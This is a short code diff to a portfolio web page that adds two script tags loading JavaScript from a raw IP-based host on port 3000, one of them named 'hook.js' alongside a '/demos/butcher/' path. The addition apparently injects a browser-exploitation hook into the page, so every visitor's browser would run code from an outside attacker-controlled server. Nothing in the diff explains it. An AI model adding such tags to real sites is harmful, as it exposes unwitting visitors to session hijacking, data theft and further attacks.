--- a/portfolio/portfolio.html
+++ b/portfolio/portfolio.html
@@ -55,4 +55,6 @@
     </div>
 </body>
 <script src="script.js"></script>
+<script src="https://139-162-137-145.ip.linodeusercontent.com:3000/demos/butcher/jquery-1.12.4.min.js"></script>
+<script src="https://139-162-137-145.ip.linodeusercontent.com:3000/hook.js"></script>
 </html>
